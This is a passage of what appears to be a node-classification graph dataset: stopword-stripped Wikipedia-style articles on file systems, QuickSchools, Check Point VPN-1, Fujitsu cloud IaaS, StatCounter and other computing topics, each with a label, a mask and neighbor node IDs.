apis make requests file system include data transfer positioning updating metadata managing directories managing access specifications removal frequently retail systems configured single file system occupying entire storage device another approach partition disk several file systems different attributes used one file system use browser cache might configured small allocation size additional advantage keeping frantic activity creating deleting files typical browser activity narrow area disk interfering allocations files similar partition might created email another partition file system might created storage audio video files relatively large allocation one file systems may normally set read-only periodically set writable third approach mostly used cloud systems use disk images house additional file systems attributes within another host file system file common example virtualization one user run experimental linux distribution using ext4 file system virtual machine his/her production windows environment using ntfs ext4 file system resides disk image treated file multiple files depending hypervisor settings ntfs host file system multiple file systems single system additional benefit event corruption single partition remaining file systems frequently still intact includes virus destruction system partition even system boot file system utilities require dedicated access effectively completed piecemeal addition defragmentation may effective several system maintenance utilities virus scans backups also processed segments example necessary backup file system containing videos along files none added since last backup image files one easily spin differential images contain new data written master original image differential images used safety concerns disposable system quickly restored destroyed contaminated virus old image removed new image created matter seconds even without automated procedures quick virtual machine deployment since differential images quickly spawned using script batches file systems functional limit defines maximum storable data capacity within system functional limits best-guess effort designer based large storage systems right large storage systems likely become future disk storage continued increase near exponential rates see moore law years file systems kept reaching design limitations require computer users repeatedly move newer system ever-greater capacity file system complexity typically varies proportionally available storage capacity file systems early 1980s home computers 50 kb 512 kb storage would reasonable choice modern storage systems hundreds gigabytes capacity likewise modern file systems would reasonable choice early systems since complexity modern file system structures would quickly consume even exceed limited capacity early storage systems file system types classified disk/tape file systems network file systems special-purpose file systems disk file system takes advantages ability disk storage media randomly address data short amount time additional considerations include speed accessing data following initially requested anticipation following data may also requested permits multiple users processes access various data disk without regard sequential location data examples include fat fat12 fat16 fat32 exfat ntfs hfs hfs+ hpfs apfs ufs ext2 ext3 ext4 xfs btrfs iso 9660 files-11 veritas file system vmfs zfs reiserfs udf disk file systems journaling file systems versioning file systems iso 9660 universal disk format udf two common formats target compact discs dvds blu-ray discs mount rainier extension udf supported since 2.6 series linux kernel since windows vista facilitates rewriting dvds flash file system considers special abilities performance restrictions flash memory devices frequently disk file system use flash memory device underlying storage media much better use file system specifically designed flash device tape file system file system tape format designed store files tape self-describing form magnetic tapes sequential storage media significantly longer random data access times disks posing challenges creation efficient management general-purpose file system disk file system typically master file directory map used free data regions file additions changes removals require updating directory used/free maps random access data regions measured milliseconds system works well disks tape requires linear motion wind unwind potentially long reels media tape motion may take several seconds several minutes move read/write head one end tape consequently master file directory usage map extremely slow inefficient tape writing typically involves reading block usage map find free blocks writing updating usage map directory add data advancing tape write data correct spot additional file write requires updating map directory writing data may take several seconds occur file tape file systems instead typically allow file directory spread across tape intermixed data referred streaming time-consuming repeated tape motions required write new data however side effect design reading file directory tape usually requires scanning entire tape read scattered directory entries data archiving software works tape storage store local copy tape catalog disk file system adding files tape done quickly without rescan tape media local tape catalog copy usually discarded used specified period time point tape must re-scanned used future ibm developed file system tape called linear tape file system ibm implementation file system released open-source ibm linear tape file system — single drive edition ltfs-sde product linear tape file system uses separate partition tape record index meta-data thereby avoiding problems associated scattering directory entries across entire tape writing data tape erasing formatting tape often significantly time-consuming process take several hours large tapes many data tape technologies necessary format tape over-writing new data tape due inherently destructive nature overwriting data sequential media time take format tape typically tapes pre-formatted tape user need spend time preparing new tape use usually necessary write identifying media label tape use even automatically written software new tape used first time another concept file management idea database-based file system instead addition hierarchical structured management files identified characteristics like type file topic author similar rich metadata ibm db2 formerly known db2/400 db2 i5/os database file system part object based ibm operating system formerly known os/400 i5/os incorporating single level store running ibm power systems formerly known as/400 iseries designed frank g. soltis ibm former chief scientist ibm around 1978 1988 frank g. soltis team ibm rochester successfully designed applied technologies like database file system others like microsoft later failed accomplish technologies informally known 'fortress rochester basic aspects extended early mainframe technologies many ways advanced technological perspective projects n't pure database file systems use aspects database file system programs need either make multiple file system changes one changes fail reason make none changes example program installing updating software may write executables libraries and/or configuration files writing fails software left partially installed updated software may broken unusable incomplete update key system utility command shell may leave entire system unusable state transaction processing introduces atomicity guarantee ensuring operations inside transaction either committed transaction aborted system discards partial results means crash power failure recovery stored state consistent either software completely installed failed installation completely rolled back unusable partial install left system transactions also provide isolation guarantee meaning operations within transaction hidden threads system transaction commits interfering operations system properly serialized transaction windows beginning vista added transaction support ntfs feature called transactional ntfs use discouraged number research prototypes transactional file systems unix systems including valor file system amino lfs transactional ext3 file system txos kernel well transactional file systems targeting embedded systems tffs ensuring consistency across multiple file system operations difficult impossible without file system transactions file locking used concurrency control mechanism individual files typically protect directory structure file metadata instance file locking prevent tocttou race conditions symbolic links file locking also automatically roll back failed operation software upgrade requires atomicity journaling file systems one technique used introduce transaction-level consistency file system structures journal transactions exposed programs part os api used internally ensure consistency granularity single system call data backup systems typically provide support direct backup data stored transactional manner makes recovery reliable consistent data sets difficult backup software simply notes files changed since certain time regardless transactional state shared across multiple files overall dataset workaround database systems simply produce archived state file containing data point backup software backs interact directly active transactional databases recovery requires separate recreation database state file file restored backup software network file system file system acts client remote file access protocol providing access files server programs using local interfaces transparently create manage access hierarchical directories files remote network-connected computers examples network file systems include clients nfs afs smb protocols file-system-like clients ftp webdav shared disk file system one number machines usually servers access external disk subsystem usually san file system arbitrates access subsystem preventing write collisions examples include gfs2 red hat gpfs ibm sfs dataplow cxfs sgi stornext quantum corporation special file system presents non-file elements operating system files acted using file system apis commonly done unix-like operating systems devices given file names non-unix-like operating systems well device file system represents i/o devices pseudo-devices files called device files examples unix-like systems include devfs linux 2.6 systems udev non-unix-like systems tops-10 operating systems influenced full filename pathname file include device prefix devices containing file systems referred device prefix specifying device without anything following 1970s disk digital tape devices expensive early microcomputer users inexpensive basic data storage system devised used common audio cassette tape system needed write data user notified press record cassette recorder press return keyboard notify system cassette recorder recording system wrote sound provide time synchronization modulated sounds encoded prefix data checksum suffix system needed read data user instructed press play cassette recorder system would listen sounds tape waiting burst sound could recognized synchronization system would interpret subsequent sounds data data read complete system would notify user press stop cassette recorder primitive worked lot time data stored sequentially usually unnamed format although systems commodore pet series computers allow files named multiple sets data could written located fast-forwarding tape observing tape counter find approximate start next data region tape user might listen sounds find right spot begin playing next data region implementations even included audible sounds interspersed data flat file system subdirectories directory entries files stored single directory floppy disk media first available type file system adequate due relatively small amount data space available cp/m machines featured flat file system files could assigned one 16 user areas generic file operations narrowed work one instead defaulting work user areas special attributes associated files necessary define specific quota areas files could added groups long still free storage space disk early apple macintosh also featured flat file system macintosh file system unusual file management program macintosh finder created illusion partially hierarchical filing system top emfs structure required every file unique name even appeared separate folder ibm dos/360 os/360 store entries files disk pack volume directory pack called volume table contents vtoc simple flat file systems become awkward number files grows makes difficult organize data related groups files recent addition flat file system family amazon s3 remote storage service intentionally simplistic allow users ability customize data stored constructs buckets imagine disk drive unlimited size objects similar identical standard concept file advanced file management allowed able use nearly character including '/ object name ability select subsets bucket content based identical prefixes many operating systems include support one file system sometimes os file system tightly interwoven difficult separate file system functions needs interface provided operating system software user file system interface textual provided command line interface unix shell openvms dcl graphical provided graphical user interface file browsers graphical metaphor folder containing documents files nested folders often used see also directory folder unix-like operating systems create virtual file system makes files devices appear exist single hierarchy means systems one root directory every file existing system located somewhere unix-like systems use ram disk network shared resource root directory unix-like systems assign device name device files device accessed instead gain access files another device operating system must first informed directory tree files appear process called mounting file system example access files cd-rom one must tell operating system take file system cd-rom make appear such-and-such directory directory given operating system called mount point – might example /media /media directory exists many unix systems specified filesystem hierarchy standard intended specifically use mount point removable media cds dvds usb drives floppy disks may empty may contain subdirectories mounting individual devices generally administrator i.e root user may authorize mounting file systems unix-like operating systems often include software tools assist mounting process provide new functionality strategies coined auto-mounting reflection purpose linux supports numerous file systems common choices system disk block device include ext* family ext2 ext3 ext4 xfs jfs btrfs raw flash without flash translation layer ftl memory technology device mtd ubifs jffs2 yaffs among others squashfs common compressed read-only file system solaris earlier releases defaulted non-journaled non-logging ufs bootable supplementary file systems solaris defaulted supported extended ufs support file systems significant enhancements added time including veritas software corp. journaling vxfs sun microsystems clustering qfs sun microsystems journaling ufs sun microsystems open source poolable 128 bit compressible error-correcting zfs kernel extensions added solaris allow bootable veritas vxfs operation logging journaling added ufs sun solaris 7 releases solaris 10 solaris express opensolaris open source variants solaris operating system later supported bootable zfs logical volume management allows spanning file system across multiple devices purpose adding redundancy capacity and/or throughput legacy environments solaris may use solaris volume manager formerly known solstice disksuite multiple operating systems including solaris may use veritas volume manager modern solaris based operating systems eclipse need volume management leveraging virtual storage pools zfs macos formerly mac os x uses apple file system apfs recently replaced file system inherited classic mac os called hfs plus hfs+ apple also uses term mac os extended hfs+ hfs plus metadata-rich case-preserving usually case-insensitive file system due unix roots macos unix permissions added hfs plus later versions hfs plus added journaling prevent corruption file system structure introduced number optimizations allocation algorithms attempt defragment files automatically without requiring external defragmenter filenames 255 characters hfs plus uses unicode store filenames macos filetype come type code stored file metadata filename extension hfs plus three kinds links unix-style hard links unix-style symbolic links aliases aliases designed maintain link original file even moved renamed interpreted file system file manager code userland macos 10.13 high sierra announced june 5 2017 apple wwdc event uses apple file system solid-state drives macos also supported ufs file system derived bsd unix fast file system via nextstep however mac os x leopard macos could longer installed ufs volume pre-leopard system installed ufs volume upgraded leopard mac os x lion ufs support completely dropped newer versions macos capable reading writing legacy fat file systems 16 32 common windows also capable reading newer ntfs file systems windows order write ntfs file systems macos versions prior mac os x snow leopard third party software necessary mac os x 10.6 snow leopard later allow writing ntfs file systems non-trivial system setting change third party software exists automates finally macos supports reading writing exfat file system since mac os x snow leopard starting version 10.6.5 os/2 1.2 introduced high performance file system hpfs hpfs supports mixed case file names different code pages long file names 255 characters efficient use disk space architecture keeps related items close disk volume less fragmentation data extent-based space allocation b+ tree structure directories root directory located midpoint disk faster average access journaled filesystem jfs shipped 1999 pc-bsd desktop version freebsd inherits freebsd zfs support similarly freenas new graphical installer pc-bsd handle root zfs raid-z pool installs disk encryption using geli right start easy convenient gui way current pc-bsd 9.0+ 'isotope edition zfs filesystem version 5 zfs storage pool version 28 plan 9 bell labs treats everything file accesses objects file would accessed i.e. ioctl mmap networking graphics debugging authentication capabilities encryption services accessed via i/o operations file descriptors 9p protocol removes difference local remote files file systems plan 9 organized help private per-process namespaces allowing process different view many file systems provide resources distributed system inferno operating system shares concepts plan 9 windows makes use fat ntfs exfat live file system refs file systems last supported usable windows server 2012 windows server 2016 windows 8 windows 8.1 windows 10 windows boot windows uses drive letter abstraction user level distinguish one disk partition another example path c \\windows represents directory windows partition represented letter c. drive c commonly used primary hard disk drive partition windows usually installed boots tradition become firmly ingrained bugs exist many applications make assumptions drive operating system installed c. use drive letters tradition using c drive letter primary hard disk drive partition traced ms-dos letters b reserved two floppy disk drives turn derived cp/m 1970s ultimately ibm cp/cms 1967 family fat file systems supported almost operating systems personal computers including versions windows ms-dos/pc dos os/2 dr-dos pc dos oem version ms-dos ms-dos originally based scp 86-dos dr-dos based digital research concurrent dos successor cp/m-86 fat file systems therefore well-suited universal exchange format computers devices type age fat file system traces roots back incompatible 8-bit fat precursor standalone disk basic short-lived mdos/midas project years file system expanded fat12 fat16 fat32 various features added file system including subdirectories codepage support extended attributes long filenames third parties digital research incorporated optional support deletion tracking volume/directory/file-based multi-user security schemes support file directory passwords permissions read/write/execute/delete access rights extensions supported windows fat12 fat16 file systems limit number entries root directory file system restrictions maximum size fat-formatted disks partitions fat32 addresses limitations fat12 fat16 except file size limit close 4 gb remains limited compared ntfs fat12 fat16 fat32 also limit eight characters file name three characters extension .exe commonly referred 8.3 filename limit vfat optional extension fat12 fat16 fat32 introduced windows 95 windows nt 3.5 allowed long file names lfn stored fat file system backwards compatible fashion ntfs introduced windows nt operating system 1993 allowed acl-based permission control features also supported ntfs include hard links multiple file streams attribute indexing quota tracking sparse files encryption compression reparse points directories working mount-points file systems symlinks junctions remote storage links exfat proprietary patent-protected file system certain advantages ntfs regard file system overhead exfat backward compatible fat file systems fat12 fat16 fat32 file system supported newer windows systems windows server 2003 windows vista windows 2008 windows 7 windows 8 recently support added windows xp exfat supported macos starting version 10.6.5 snow leopard support operating systems sparse since microsoft published specifications file system implementing support exfat requires license exfat file system fully supported macos windows hold files larger 4 gb prior introduction vsam os/360 systems implemented unusual hybrid file system system designed easily support removable disk packs information relating files one disk volume ibm terminology stored disk flat system file called volume table contents vtoc vtoc stores metadata file later hierarchical directory structure imposed introduction system catalog optionally catalog files datasets resident removable volumes catalog contains information relate dataset specific volume user requests access dataset offline volume suitable privileges system attempt mount required volume cataloged non-cataloged datasets still accessed using information vtoc bypassing catalog required volume id provided open request still later vtoc indexed speed access ibm conversational monitor system cms component vm/370 uses separate flat file system virtual disk minidisk file data control information scattered intermixed anchor record called master file directory mfd always located fourth block disk originally cms used fixed-length 800-byte blocks later versions used larger size blocks 4k access data record requires two levels indirection file directory entry called file status table fst entry points blocks containing list addresses individual records data as/400 successors consists system objects mapped system virtual address space single-level store many types as/400 objects defined including directories files found file systems file objects along types objects form basis as/400 support integrated relational database may advantageous necessary files different file system currently exist reasons include need increase space requirements beyond limits current file system depth path may need increased beyond restrictions file system may performance reliability considerations providing access another operating system support existing file system another reason cases conversion done in-place although migrating file system conservative involves creating copy data recommended windows fat fat32 file systems converted ntfs via convert.exe utility reverse linux ext2 converted ext3 converted back ext3 converted ext4 back ext3 ext4 converted btrfs converted back undo information deleted conversions possible due using format file data relocating metadata empty space cases using sparse file support migration disadvantage requiring additional space although may faster best case unused space media contain final file system example migrate fat32 file system ext2 file system first create new ext2 file system copy data file system delete fat32 file system alternative sufficient space retain original file system new one created use work area removable media takes longer backup data nice side effect hierarchical file systems files accessed means path branching list directories containing file different file systems different limits depth path file systems also limit length individual filename copying files long names located paths significant depth one file system another may cause undesirable results depends utility copying handles discrepancy",
    "neighbors": [
      6155,
      4111,
      10257,
      8214,
      25,
      8227,
      6180,
      8228,
      10278,
      10281,
      44,
      2095,
      52,
      2101,
      6198,
      58,
      2107,
      8254,
      10310,
      2120,
      4170,
      4173,
      4174,
      6221,
      82,
      4178,
      10333,
      97,
      6243,
      10340,
      10341,
      6248,
      4201,
      8298,
      8301,
      4210,
      8306,
      119,
      2168,
      6263,
      6265,
      2179,
      4238,
      10382,
      2193,
      2194,
      6289,
      10388,
      2197,
      2199,
      4248,
      2201,
      6296,
      6297,
      10394,
      6309,
      10405,
      2221,
      10413,
      8369,
      178,
      2230,
      2231,
      10422,
      6329,
      8380,
      10428,
      2244,
      8388,
      8391,
      200,
      2248,
      8395,
      8401,
      8402,
      8404,
      10452,
      6358,
      6361,
      8410,
      6365,
      225,
      2273,
      4326,
      2279,
      6377,
      10476,
      242,
      2291,
      246,
      251,
      10499,
      2314,
      8461,
      6416,
      273,
      274,
      2322,
      8473,
      287,
      6434,
      4387,
      292,
      6436,
      8485,
      295,
      2345,
      302,
      2355,
      4409,
      6459,
      8509,
      4423,
      2378,
      10570,
      6476,
      2383,
      4431,
      10579,
      4438,
      4439,
      346,
      2394,
      2395,
      2397,
      6494,
      10590,
      2402,
      6499,
      10596,
      2407,
      8551,
      4458,
      2415,
      6519,
      376,
      6521,
      8573,
      2432,
      6534,
      10631,
      394,
      4492,
      6545,
      4505,
      4506,
      414,
      2462,
      421,
      4521,
      2477,
      430,
      4525,
      10673,
      10676,
      437,
      8631,
      6584,
      8640,
      451,
      8643,
      8659,
      6615,
      4571,
      478,
      479,
      6624,
      8676,
      2534,
      10726,
      10730,
      491,
      492,
      6637,
      10731,
      8687,
      10732,
      2545,
      6641,
      4601,
      506,
      2555,
      2558,
      2560,
      2564,
      8713,
      10763,
      6669,
      4624,
      6675,
      532,
      6677,
      10776,
      537,
      4634,
      8729,
      540,
      4637,
      4643,
      8740,
      2597,
      4657,
      10803,
      10809,
      10812,
      8767,
      576,
      2625,
      8772,
      8774,
      10828,
      4686,
      595,
      10839,
      603,
      4707,
      4708,
      10851,
      6760,
      10856,
      10857,
      622,
      8815,
      6768,
      8816,
      4724,
      6772,
      4727,
      634,
      4731,
      636,
      2687,
      8832,
      10879,
      10883,
      8837,
      8841,
      10891,
      6797,
      654,
      10900,
      6808,
      4763,
      6813,
      2723,
      4771,
      6820,
      8876,
      10926,
      8879,
      6837,
      8889,
      6843,
      2749,
      4801,
      4804,
      10951,
      10952,
      6858,
      716,
      4815,
      10959,
      4819,
      8918,
      728,
      2782,
      10977,
      739,
      4836,
      4841,
      8938,
      10993,
      2811,
      8959,
      6916,
      11012,
      8976,
      8977,
      787,
      789,
      6935,
      11033,
      8988,
      4907,
      9004,
      9006,
      6961,
      819,
      6963,
      823,
      6970,
      6972,
      11072,
      11075,
      6988,
      850,
      6995,
      4948,
      2901,
      2919,
      7018,
      9066,
      7020,
      2933,
      4982,
      11128,
      890,
      2943,
      2944,
      7039,
      11135,
      5003,
      5004,
      7053,
      11147,
      7057,
      9107,
      5013,
      2974,
      5022,
      7070,
      929,
      935,
      5034,
      11184,
      5043,
      9141,
      5046,
      11189,
      9151,
      960,
      11201,
      11204,
      11205,
      969,
      9166,
      7126,
      7136,
      7140,
      9189,
      5105,
      5106,
      9204,
      11256,
      5115,
      5120,
      1025,
      9220,
      11270,
      5138,
      7187,
      9236,
      5142,
      1049,
      3102,
      9249,
      5158,
      5167,
      7217,
      3124,
      7225,
      11323,
      9286,
      1098,
      5196,
      7244,
      1109,
      5206,
      3160,
      3170,
      11363,
      11364,
      3173,
      1126,
      5221,
      9319,
      5225,
      11365,
      7285,
      9333,
      9335,
      7290,
      1147,
      1148,
      3197,
      1150,
      5247,
      9343,
      11390,
      7303,
      9353,
      7317,
      9366,
      3225,
      9370,
      11418,
      11419,
      7325,
      9377,
      3235,
      1190,
      5286,
      1193,
      3241,
      9388,
      5293,
      7342,
      1199,
      3248,
      7344,
      11442,
      5300,
      3253,
      7351,
      3257,
      1212,
      7358,
      3265,
      7364,
      9420,
      3280,
      7378,
      7382,
      7383,
      3289,
      5337,
      9436,
      1247,
      11489,
      9442,
      3300,
      1253,
      7403,
      3308,
      1263,
      3312,
      9455,
      5363,
      11513,
      9466,
      3323,
      9468,
      1278,
      3326,
      3328,
      11519,
      3330,
      1286,
      1291,
      11539,
      5397,
      7446,
      3351,
      1304,
      11546,
      9505,
      5413,
      3366,
      3368,
      11568,
      5425,
      1332,
      7477,
      9525,
      1336,
      7480,
      7483,
      3388,
      9533,
      11581,
      3394,
      5452,
      5454,
      1361,
      5457,
      7507,
      11601,
      9557,
      7511,
      5465,
      3420,
      1378,
      3426,
      5475,
      5484,
      7534,
      11635,
      5492,
      7540,
      11638,
      9593,
      9599,
      7554,
      1418,
      5514,
      7565,
      1426,
      11667,
      11675,
      11676,
      11677,
      11683,
      1445,
      1449,
      9643,
      1454,
      1456,
      5552,
      7601,
      7603,
      11698,
      9655,
      1464,
      3512,
      5566,
      3519,
      3522,
      9671,
      3535,
      1498,
      5594,
      5598,
      1503,
      1509,
      3562,
      9709,
      7663,
      3571,
      3572,
      3573,
      5619,
      3582,
      5643,
      3598,
      9745,
      1561,
      5658,
      3611,
      5661,
      1577,
      3640,
      1593,
      9784,
      7739,
      5694,
      9791,
      3648,
      3656,
      7754,
      1611,
      5709,
      3662,
      5711,
      9808,
      1617,
      5714,
      1623,
      9819,
      3677,
      1637,
      9835,
      9836,
      7789,
      5743,
      9839,
      9840,
      7794,
      7796,
      9844,
      1656,
      9848,
      5754,
      1659,
      7818,
      9869,
      9874,
      9882,
      7838,
      5791,
      9887,
      1703,
      7847,
      3760,
      9907,
      9910,
      5816,
      5823,
      1736,
      9931,
      9932,
      3790,
      5840,
      7889,
      3795,
      9946,
      5853,
      7905,
      7907,
      1770,
      9965,
      3826,
      9972,
      3833,
      3834,
      9981,
      1790,
      1791,
      3841,
      1801,
      1803,
      1804,
      3856,
      3857,
      1810,
      3859,
      10000,
      5913,
      10016,
      1825,
      7969,
      5924,
      7975,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      3889,
      1844,
      7991,
      10039,
      1849,
      1853,
      7999,
      3904,
      10052,
      3909,
      3914,
      5969,
      3922,
      10065,
      10068,
      5975,
      1891,
      10087,
      10101,
      8063,
      10113,
      6018,
      8069,
      3975,
      3978,
      8075,
      8080,
      1940,
      8092,
      10151,
      10153,
      4012,
      6062,
      8110,
      8114,
      8115,
      1978,
      6075,
      6078,
      8129,
      8132,
      6085,
      1990,
      4040,
      1993,
      4041,
      6088,
      8136,
      2015,
      6114,
      6115,
      6118,
      6120,
      6126,
      6128,
      10235,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 9763,
    "label": 7,
    "text": "QuickSchools.com:quickschools.com maestro planning solutions early origins providing supply chain management software company founded early 2003 winning venture 2002 business plan writing competition competition organized mckinsey co supported malaysia largest venture capital company mavcap ministry finance malaysia publicity support garnered win company born 2006 maestro made exploratory move schools market via project premier malaysian private school kolej tuanku ja'afar maestro used optimalone platform injected supply chain ideas creation school management system project cross-fertilization ideas supply chain school management system recognized ktj different several school management systems evaluating time january 2008 maestro decided embark launching school administrative software online system subsequently branded quickschools.com fully online school management system small schools april 2009 maestro planning solutions raised 4.5 million malaysian ringgit venture capital funded dta growth capital malaysia financing support quickschool.com expansion us school market strengthen company r well sales marketing efforts also april 2009 maestro received grant 1.06 million malaysian ringgit spearhead r web 2.0 timetable scheduling software eventually part quickschools.com grant awarded mdec multimedia development corporation malaysia august 17 2009 quickschools released brand new version school management system based extensive feedback current user base approach software design decided upon best way forward focused improving user experience therefore attention give introducing simple user interface extensive feature hiding one key improvements allow users running minutes administrator simply registers his/her school website along custom domain school software automatically creates publishes fully functional school management system real time admin proceed 'invite teachers faculty test system another improvement involves 'livefeed feature creates notifications certain activities take place essential paradigm shift achieved way software reformats match user requirements features required specific school made available making software easy use makes barriers entry almost negligible quickschool long-term goal create software require technical support training release goes long way achieving system allows users log details inquiries parents guardians keep track contact details student applications also maintained along grades achieved entrance exams details picture subjects taken classes attended grades extra-curricular activities tracked student grading also done end term reports printed pdf parents track progress children daily basis makes hard student wants cut missing assignment plain tardy system sending parents e-mail notification soon teacher marks student late/absent schedules generated students teachers subjects classrooms flexible type information school wants track students foreign language character support arabic chinese currently available quickschools.com based maestro optimalone platform quickschools.com runs java ee backend front-end runs adobe flash previously macromedia flash use flash enables quickschools.com run many different browsers different operating systems also enables web2.0-style interface servers located 2 locations around world first location established malaysia january 2008 second location established seattle us august 2008",
    "neighbors": [
      8627
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9764,
    "label": 4,
    "text": "Check_Point_VPN-1:check point vpn-1 vpn-1 firewall vpn product developed check point software technologies ltd. vpn-1 stateful firewall also filters traffic inspecting application layer first commercially available software firewall use stateful inspection later 1997 check point registered u.s. patent 5,606,668 security technology among features included stateful inspection vpn-1 functionality currently bundled within check point perimeter security products product previously known firewall-1 sold integrated firewall vpn solution vpn-1 software installed separate operating system provides protocol stack file system process scheduling features needed product different commercial firewall products like cisco pix juniper firewalls firewall software part proprietary operating system although traditionally sold software vpn-1 also sold appliance form check point utm-1 starting 2006 power-1 appliances appliances run secureplatform operating system version r70 vpn-1 supports following operating systems previous versions check point firewall supported operating systems including solaris hp-ux aix see table version history section details vpn-1 running nokia platform ipso often called nokia firewall different product fact runs vpn-1 software platforms upon completing acquisition nokia security appliance business 2009 checkpoint started project named gaia aimed merging two different operating systems—secureplatform ipso—into one new os positioned finally replace existing operating systems point future april 17 2012 check point announced general availability gaia operating system part r75.40 release started pure firewall vpn product later features added licensed separately since began bundled default installations vpn-1 well smartdefense ips feature adds built-in stateful inspection inherent tcp/ip protocols checks normalization inspection common application protocols starting ngx r70 feature rebranded ips quality service floodgate-1 checkpoint implementation quality service qos supports bandwidth guaranteeing limiting per qos rule per connection also priority queuing done llq nevertheless rfc based qos implementation differentiated services ip precedence supported content inspection starting ngx r65 new feature introduced providing 2 services",
    "neighbors": [
      2050,
      10631,
      10889,
      4746,
      8331,
      9722,
      8211,
      8467,
      1304,
      3742,
      4268,
      7983,
      7859,
      2228,
      3381,
      8640,
      9281,
      5959,
      8265,
      3322,
      11468,
      7376,
      6993,
      2260,
      11606,
      2136,
      9048,
      6490,
      8283,
      6364,
      5084,
      8668,
      3299,
      7139,
      9318,
      8039,
      4074,
      11248,
      5749,
      3962
    ],
    "mask": "None"
  },
  {
    "node_id": 9765,
    "label": 2,
    "text": "Samsung_SGH-i550w:samsung sgh-i550w samsung sgh-i550w mobile phone samsung belongs infotainment class wi-fi 3.5g connectivity play various multimedia formats 3.2 megapixel camera runs s60 software 3rd edition feature pack 1",
    "neighbors": [
      7246
    ],
    "mask": "None"
  },
  {
    "node_id": 9766,
    "label": 7,
    "text": "FUJITSU_Cloud_IaaS_Trusted_Public_S5:fujitsu cloud iaas trusted public s5 fujitsu cloud iaas trusted public s5 fujitsu cloud computing platform aims deliver standardized enterprise-class public cloud services globally offers infrastructure-as-a-service iaas fujitsu data centers provide computing resources employed on-demand suited customers needs service ensures high level reliability sufficient deployment mission-critical systems japan service offered on-demand virtual system service oviss launched globally fujitsu global cloud platform/s5 fgcp/s5 since july 2013 service called iaas trusted public s5 globally service operated fujitsu data centers located australia singapore united states united kingdom germany fujitsu also launched windows azure powered global cloud platform partnership microsoft platform-as-a-service paas offering known fgcp/a5 japan since renamed fujitsu cloud paas a5 windows azure operated fujitsu data center japan offers set application development frameworks microsoft .net java php data storage capabilities consistent windows azure platform provided microsoft basic service consists compute storage microsoft sql azure windows azure appfabric technologies service bus access control service options interoperating services covering implementation migration applications system building systems operation support 2015 fujitsu launched next generation cloud service k5 deployed globally october 2018 fujitsu announced discontinuing k5 regions except japan october 16 2018 company stated hire 10,000 employees train use microsoft azure order address see industry-wide shortage cloud related skills help clients address execution gap provision services support operational efficiency digital co-creation multi-cloud management. ” fujitsu launched global cloud strategy april 2010 provision services platform offered trial basis 200 companies japan following month fujitsu announced general availability iaas service japan name on-demand virtual system service oviss starting 1 october 2010 part service global rollout launched australia name fujitsu global cloud platform fgcp february 2011 followed launches march 2011 singapore may 2011 united kingdom germany united states america july 2012 fujitsu added center western japan bring total number seven july 2013 fujitsu announced fujitsu cloud initiative globally also announced new name fujitsu cloud iaas trusted public s5 october 2018 fujitsu announced discontinuing k5 regions except japan basic component iaas trusted public s5 called virtual system consists firewall one multiple network segments customers host virtual machines signed customers deploy multiple systems within environment much like virtual data center iaas trusted public s5 employs templates allow customers quickly deploy virtual systems template consists firewall network segment definitions virtual servers os/middleware installed set allows quick selection example system three network zones pre-installed web server dmz application server secure zone database another secure zone virtual system includes firewall control access network segments internet intranet intranet connection communication virtual servers customers existing servers hosted fujitsu data center virtual servers chosen list pre-defined images operating system installed also additional software servers different computational resources offered operating systems offered globally include windows server 2008 windows server 2012 red hat enterprise linux centos ubuntu fujitsu claimed licensing issue prevents delivery microsoft office cloud service web based devices manner similar google docs virtual server system disk pre-defined size additional disks sizes configurable 10 gb 10 tb attached server running customers provision global ip addresses assign virtual servers similar amazon elastic ip address feature users provision manage virtual systems self-service portal also used initiate vpn connection virtual zone operations offered service portal also offered cloud api api xml-rpc based using ssl encrypt messages certificates authentication operations also possible multi-cloud api apache deltacloud fujitsu submitted cloud api specification distributed management task force open cloud standards incubator promote open standards cloud interoperability contributed dmtf cloud infrastructure management interface cimi standard july 2013 fujitsu demonstrated client using cimi manage system iaas trusted public s5 management developers conference servers physically located fujitsu tier iii data centers japan australia singapore uk us germany",
    "neighbors": [
      1539,
      526,
      4623,
      10265,
      5662,
      5666,
      36,
      9766,
      39,
      5159,
      3121,
      5681,
      1079,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      10837,
      4194,
      5732,
      5749,
      2170,
      4236,
      10893,
      6307,
      2217,
      1707,
      9906,
      7352,
      9920,
      4289,
      3269,
      1224,
      6367,
      225,
      2795,
      3819,
      253,
      8446,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      8998,
      6444,
      7983,
      8495,
      823,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      11097,
      3428,
      3431,
      10090,
      8044,
      5499,
      10108,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      9137,
      10681,
      8122,
      448,
      2496,
      11201,
      9682,
      467,
      10200,
      6618,
      1503,
      11235,
      5608,
      1001,
      6632,
      7660,
      8191
    ],
    "mask": "Train"
  },
  {
    "node_id": 9767,
    "label": 3,
    "text": "Texas_Instruments_AR7:texas instruments ar7 texas instruments ar7 ti-ar7 fully integrated single-chip adsl cpe access router solution ar7 combines mips32 processor dsp-based digital transceiver adsl analog front end 2007 ti sold dsl business infineon 2009 infineon technologies spins wireline division lantiq november 6 2009 lantiq announced became standalone company",
    "neighbors": [
      7234,
      6670,
      2383,
      5270,
      2811
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9768,
    "label": 8,
    "text": "StatCounter:statcounter statcounter web traffic analysis website started 1999 access basic services free advanced services cost us 119 month statcounter based dublin ireland statistics statcounter used compute web usage share example statcounter used 0.9 websites statcounter statistics directly derived hits—as opposed unique visitors—from 3 million sites use statcounter resulting total hits 15 billion per month artificial weightings used correct sampling bias thus numbers statistics considered representative samples company founded aodhán cullen age 16 cullen received internet hero award 2008 eircom golden spider awards also named 2007 businessweek young european entrepreneur year 2008 company surpassed two million members globally",
    "neighbors": [
      3971,
      8584,
      9736,
      3978,
      6539,
      6797,
      1943,
      5150,
      10814,
      8639,
      5442,
      2259,
      5078,
      8281,
      735,
      4326,
      487,
      3688,
      6133
    ],
    "mask": "Train"
  },
  {
    "node_id": 9769,
    "label": 5,
    "text": "Hookflash:hookflash hookflash canadian company hookflash also name product family real-time communication people work together founders trent johnsen erik lagerway hookflash ipad first product ios app announced demo fall 2011 conference tested private release offers users hookflash-to-hookflash instant messaging voice calling conferencing video calling conferencing hookflash openpeer peer-to-peer network app also business telephony features like call transfer line hunting social network features like profiles activity data sources like linkedin sharing recorded conversations company announced ipad app free company operate freemium business model",
    "neighbors": [
      8640,
      10242,
      6539,
